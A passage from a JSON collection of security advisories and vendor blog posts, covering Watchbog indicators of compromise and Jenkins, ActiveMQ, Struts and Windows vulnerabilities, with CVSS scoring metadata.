Security](<https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html>) can block malicious emails sent by threat actors as part of their campaign. \n \nNetwork Security appliances such as[ ](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)[Next-Generation Firewall (NGFW](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)),[ Next-Generation Intrusion Prevention System (NGIPS](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>)), and[ Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection into all Cisco Security products. \n \n[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nOpen Source SNORT\u24c7 Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>). \n \n\n\n## Indicators of Compromise (IOCs)\n\n \nThe following IOCs have been observed associated with Watchbog. \n \n\n\n### Hashes (SHA256):\n\n \nb383d0fdfa5036ccfa5d9c2b43cbfd814bce8778978873057b86678e5295fc61 0b0567c9b45ea0a3ea4267001f0760ccdf2b8224fceaf8979d32fcceb2d6fb7a \n \n3A6271A90D0F6CC8A2D31D45D931E8401F13F7377932BA07D871DC42F252B9CA \n \n\n\n### Domains:\n\n \naziplcr72qjhzvin[.]onion[.]to \n \n\n\n### Misc:\n\n \nMonero Wallet (Same wallet as the Alibaba Cloud Post) \n \n47k2wdnyyBoMT6N9ho5Y7uQg1J6gPsTboKP6JXfB5msf3jUUvTfEceK5U7KLnWir5VZPKgUVxpkXnJLmijau3VZ8D2zsyL7 \n \n", "modified": "2019-09-11T09:10:37", "published": "2019-09-11T09:10:37", "id": "TALOSBLOG:C136648C951F9482ABC1764BDBCABCC9", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/peidHg1L8SY/watchbog-patching.html", "type": "talosblog", "title": "Watchbog and the Importance of Patching", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "trendmicroblog": [{"lastseen": "2019-05-29T16:28:31", "bulletinFamily": "blog", "cvelist": ["CVE-2018-1000861"], "description": "\n\n \n\nWelcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about vulnerabilities that can allow hackers to retrieve data from CPUs and mine cryptocurrency.\n\nRead on:\n\n[**May\u2019s Patch Tuesday Include Fixes for \u2018Wormable\u2019 Flaw in Windows XP, Zero-Day Vulnerability**](<https://blog.trendmicro.com/trendlabs-security-intelligence/mays-patch-tuesday-include-fixes-for-wormable-flaw-in-windows-xp-zero-day-vulnerability/>)\n\n_Microsoft\u2019s May security release includes updates for 80 vulnerabilities for a number of Microsoft products, including a security update for unsupported operating systems such as Windows XP and Server 2003._\n\n[**Trend Micro Unveils Cloud-Native Security Customized to the Demand of DevOps**](<https://www.helpnetsecurity.com/2019/05/16/trend-micro-single-solution-security/>)\n\n_Trend Micro launched container security capabilities added to Trend Micro Deep Security to elevate protection across the entire DevOps lifecycle and runtime stack._\n\n[**Side-Channel Attacks RIDL, Fallout, and ZombieLoad Affect Millions of Vulnerable Intel Processors**](<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/side-channel-attacks-ridl-fallout-and-zombieload-affects-millions-of-vulnerable-intel-processors>)\n\n_Researchers found a bevy of critical vulnerabilities in modern Intel processors that, when exploited successfully, can leak or let hackers retrieve data being processed by the vulnerable CPUs. _\n\n[**Trump Issues Executive Order Paving Way for Ban on Huawei**](<https://www.axios.com/trump-huawei-ban-executive-order-eb86bc1f-8365-465d-92d8-b0dfc9ad8dc4.html>)\n\n_President Trump has issued an executive order declaring a national emergency and prohibiting U.S. companies from using telecom services that are solely owned, controlled, or directed by a foreign adversary, clearing the way for a ban on the Chinese-owned Huawei._\n\n[**Unsecured Server Leaks PII of Almost 90% of Panama Residents**](<https://www.trendmicro.com/vinfo/us/security/news/online-privacy/unsecured-server-leaks-pii-of-almost-90-of-panama-residents>)\n\n_The personally identifiable information of almost 90% of Panama\u2019s population has been divulged due to an unsecured Elasticsearch server that was found without authentication or firewall protection, connected to the internet, and publicly viewable on any browser. _\n\n**[Google Discloses Security Bug in its Bluetooth Titan Security Keys, Offers Free Replacement](<https://techcrunch.com/2019/05/15/google-recalls-its-bluetooth-titan-security-keys-because-of-a-security-bug/>)**\n\n_Google says that the security bug, which could allow an attacker in close physical proximity to circumvent the security the key is supposed to provide, is due to a \u201cmisconfiguration in the Titan Security Keys\u2019 Bluetooth pairing protocols.\u201d_\n\n**[Jenkins Vulnerability Exploited to Drop Kerberods Malware and Launch Monero Miner](<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/jenkins-vulnerability-exploited-to-drop-kerberods-malware-and-launch-monero-miner>)**\n\n_Threat actors were found exploiting CVE-2018-1000861, a vulnerability in the Stapler web framework that is used by the Apache Jenkins open-source software development automation server with versions 2.153 and earlier._\n\n**[Crypto Exchange Binance Restarting Services After Post-Hack Upgrade](<https://www.coindesk.com/crypto-exchange-binance-restarting-services-after-post-hack-upgrade>)**\n\n_Cryptocurrency exchange Binance has announced that it is back online after completing a security upgrade prompted by a recent hack that saw 7,000 BTC worth $41 million stolen._\n\nDo you worry about your personally identifiable information being divulged to cyber criminals? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: [@JonLClay.](<https://twitter.com/jonlclay>)\n\n_ _\n\n_ _\n\nThe post [This Week in Security News: Unsecured Servers and Vulnerable Processors](<https://blog.trendmicro.com/this-week-in-security-news-unsecured-servers-and-vulnerable-processors/>) appeared first on [](<https://blog.trendmicro.com>).", "modified": "2019-05-17T14:14:56", "published": "2019-05-17T14:14:56", "id": "TRENDMICROBLOG:3E70A01CB57177EC40F969FCA453BDE6", "href": "https://blog.trendmicro.com/this-week-in-security-news-unsecured-servers-and-vulnerable-processors/", "type": "trendmicroblog", "title": "This Week in Security News: Unsecured Servers and Vulnerable Processors", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-11T00:19:10", "description": "\n\nIt has been quoted by Albert Einstein, Benjamin Franklin, and others that insanity is \u201cdoing the same thing over and over again and expecting different results.\u201d I could say that in our world of cyber security, despite all the headlines about data breaches and ransomware, there is no \u201cinsanity.\u201d Products we used 25 years ago probably can\u2019t protect against the latest malware. Someone will reverse-engineer someone\u2019s code and ultimately figure out how to evade a product\u2019s protection mechanisms for detecting or blocking an attack. Entire segments of the cyber security industry exist because there is no insanity. Those who create malware or tools that exploit bugs don\u2019t do the exact same thing over and over again. Once we\u2019ve figured them out, they adjust, and then we adjust by making our products smarter \u2013 until the cycle starts again.\n\nWhen Stuxnet hit in 2010, it made headlines as a new kind of attack with massive geopolitical consequences. Microsoft released several different security patches in response, including MS10-046, to address the vulnerability in link files. Now, with the WikiLeaks documents exposure, it appears that a tool called \u201cEZCheese\u201d exploited a similar bug in link files until 2015. That tool change resulted from a set of bugs discovered through the Zero Day Initiative program that showed the original MS10-046 patch had failed. This forced a change of operational tactics to what was then an \u201cunknown link file vulnerability\u201d in Microsoft, which was likely corrected with the release of CVE-2017-8464. According to the WikiLeaks released documents, both EZCheese and its successor Brutal Kangaroo were designed to attack air-gapped networks similar to Stuxnet. You can learn more on Brutal Kangaroo and the impact the Zero Day Initiative has had on the industry by reading Brian Gorenc\u2019s commentary on his blog: [The Real-World Impact of Bug Bounties and Vulnerability Research](<http://blog.trendmicro.com/real-world-impact-bug-bounties-vulnerability-research/>).\n\n**Zero-Day Filters**\n\nThere are 23 new zero-day filters covering six vendors in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website.\n\n**_Adobe (3)_**\n\n| \n\n * 28916: ZDI-CAN-4887: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28917: ZDI-CAN-4895: Zero Day Initiative Vulnerability (Adobe Flash)\n * 28924: ZDI-CAN-4756: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)**_ _** \n---|--- \n| \n \n**_Foxit (1)_**\n\n| \n\n * 28921: ZDI-CAN-4518: Zero Day Initiative Vulnerability (Foxit Reader)**_ _** \n---|--- \n| \n \n**_Hewlett Packard Enterprise (11)_**\n\n| \n\n * 28727: HTTPS: HPE Network Automation PermissionFilter Authentication Bypass Vulnerability (ZDI-17-332)\n * 28906: ZDI-CAN-4870: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)\n * 28907: ZDI-CAN-4871: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)\n * 28908: ZDI-CAN-4872: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)\n * 28909: ZDI-CAN-4873: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)\n * 28910: ZDI-CAN-4874: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)\n * 28911: ZDI-CAN-4875: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)\n * 28912: ZDI-CAN-4876: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)\n * 28913: ZDI-CAN-4877: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)\n * 28914: ZDI-CAN-4878: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)\n * 28915: ZDI-CAN-4880: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)**_ _** \n---|--- \n| \n \n**_Microsoft (6)_**\n\n| \n\n * 28897: ZDI-CAN-4777: Zero Day Initiative Vulnerability (Microsoft Edge)\n * 28918: ZDI-CAN-4886: Zero Day Initiative Vulnerability (Microsoft Chakra)\n * 28919: ZDI-CAN-4888: Zero Day Initiative Vulnerability (Microsoft Edge)\n * 28925: ZDI-CAN-4894: Zero Day Initiative Vulnerability (Microsoft Chakra)\n * 28981: ZDI-CAN-4910: Zero Day Initiative Vulnerability (Microsoft Chakra)\n * 28982: ZDI-CAN-4884: Zero Day Initiative Vulnerability (Microsoft Edge)**_ _** \n---|--- \n| \n \n**_Schneider Electric (1)_**\n\n| \n\n * 28920: HTTP: Schneider Electric U.motion Builder loadtemplate.php SQL Injection Vulnerability (ZDI-17-374)**_ _** \n---|--- \n| \n \n**_Trend Micro (1)_**\n\n| \n\n * 28900: HTTPS: Trend Micro InterScan Web Security delete_pac_files Command Injection (ZDI-17-229)**_ _** \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-june-26-2017/>).", "cvss3": {}, "published": "2017-07-07T15:45:09", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of July 3, 2017", "type": "trendmicroblog", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-8464"], "modified": "2017-07-07T15:45:09", "id": "TRENDMICROBLOG:6AD718FC3C384CF6470A9D6815A565D3", "href": "http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-july-3-2017/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "checkpoint_advisories": [{"lastseen": "2022-06-13T22:17:28", "description": "A remote code execution vulnerability exists in the Jenkins Stapler web framework. A remote attacker can exploit this vulnerability to execute arbitrary code via a specially crafted HTTP request.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-05-21T00:00:00", "type": "checkpoint_advisories", "title": "Jenkins Stapler Web Framework Remote Code Execution (CVE-2018-1000861)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1000861"], "modified": "2019-08-21T00:00:00", "id": "CPAI-2019-0670", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-13T22:09:56", "description": "A remote code execution vulnerability exists in Jenkins Stapler Web Framework. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-21T00:00:00", "type": "checkpoint_advisories", "title": "Jenkins Stapler Web Framework Code Execution (CVE-2018-1000861)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1000861"], "modified": "2020-09-21T00:00:00", "id": "CPAI-2018-1691", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:38:21", "description": "A directory traversal vulnerability exists in Apache ActiveMQ. The vulnerability is due to insufficient input validation in the destination header when processing a MOVE request or in the file upload functionality when processing a PUT request. A remote, unauthenticated attacker may exploit this vulnerability by sending a file with a PUT request, followed by a crafted MOVE request to the server or by sending a malicious file using a crafted PUT request to replace executable components of ActiveMQ.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-25T00:00:00", "type": "checkpoint_advisories", "title": "Apache ActiveMQ Fileserver Multi Methods Directory Traversal (CVE-2016-3088)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3088"], "modified": "2019-01-16T00:00:00", "id": "CPAI-2016-0498", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:46:37", "description": "A remote code execution vulnerability has been reported in Windows OS. The vulnerability is due to an error in the way HTTP.sys handles a malicious HTTP header. Successful exploitation would result in a remote code execution.", "cvss3": {}, "published": "2015-04-14T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows HTTP.sys Remote Code Execution (MS15-034: CVE-2015-1635)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1635"], "modified": "2015-10-21T00:00:00", "id": "CPAI-2015-0410", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:35:34", "description": "A remote code execution vulnerability exists in Encapsulated PostScript (EPS) of Microsoft Office. The vulnerability is due to the way that Microsoft Office does not properly handle objects in memory while parsing specially crafted Office files. A remote attacker can exploit this issue by enticing a target user to open a specially crafted Office file.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-10T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Office EPS Remote Code Execution (CVE-2017-0262)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0262"], "modified": "2017-06-18T00:00:00", "id": "CPAI-2017-0406", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T15:47:16", "description": "A Use-After-Free vulnerability exists in Windows. The vulnerability occurs when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode with full user rights.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-09T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Win32k Elevation of Privilege (CVE-2017-0263)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0263"], "modified": "2017-05-09T00:00:00", "id": "CPAI-2017-0370", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:35:20", "description": "A remote code execution vulnerability exists in the Apache Struts2 using Struts1 plugin. An attacker can leverage this vulnerability by sending a crafted HTTP request to a target system. Successful exploitation could result in execution of arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-07-09T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts2 Struts1_Plugin Remote Code Execution (CVE-2017-9791)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9791"], "modified": "2017-07-23T00:00:00", "id": "CPAI-2017-0558", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2023-04-18T13:07:35", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 3.11.59. See the following advisory for the container images for this release: https://access.redhat.com/errata/RHBA-2019:0023 Space precludes documenting all of the bug fixes and enhancements in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes: https://docs.openshift.com/container-platform/3.11/release_notes/ocp_3_11_release_notes.html All OpenShift Container Platform 3.11 users are advised to upgrade to these updated packages and images.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-05-16T03:23:55", "type": "veracode", "title": "Arbitrary Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1000861"], "modified": "2022-06-13T20:21:27", "id": "VERACODE:19781", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-19781/summary", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-04-18T16:12:30", "description": "struts2-struts1-plugin is vulnerable to remote code execution (RCE) attacks. These attacks are possible because the user input are not sanitized and are directly passed through `messages.add()` to be used as a part of an error message in the `ActionMessage` class. This doesn't affect users of the Struts 2.5.x series or applications that do not use the Struts 1 plugin.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-07-07T21:38:00", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9791"], "modified": "2020-05-28T21:01:34", "id": "VERACODE:4553", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-4553/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2023-04-11T01:45:22", "description": "A code execution vulnerability exists in the Stapler web framework used by Jenkins 2.153 and earlier, LTS 2.138.3 and earlier in stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-13T01:01:00", "type": "osv", "title": "Deserialization of Untrusted Data in Jenkins", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1000861"], "modified": "2023-04-11T01:45:19", "id": "OSV:GHSA-HHPM-5CP2-HG4X", "href": "https://osv.dev/vulnerability/GHSA-hhpm-5cp2-hg4x", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-04-11T01:30:48", "description": "The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-14T01:14:51", "type": "osv", "title": "Improper Input Validation in Apache ActiveMQ", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3088"], "modified": "2023-04-11T01:30:42", "id": "OSV:GHSA-RXQH-FC23-GXP2", "href": "https://osv.dev/vulnerability/GHSA-rxqh-fc23-gxp2", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-28T05:47:23", "description": "The Struts 1 plugin used with Apache Struts 2.1.x and 2.3.x might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", 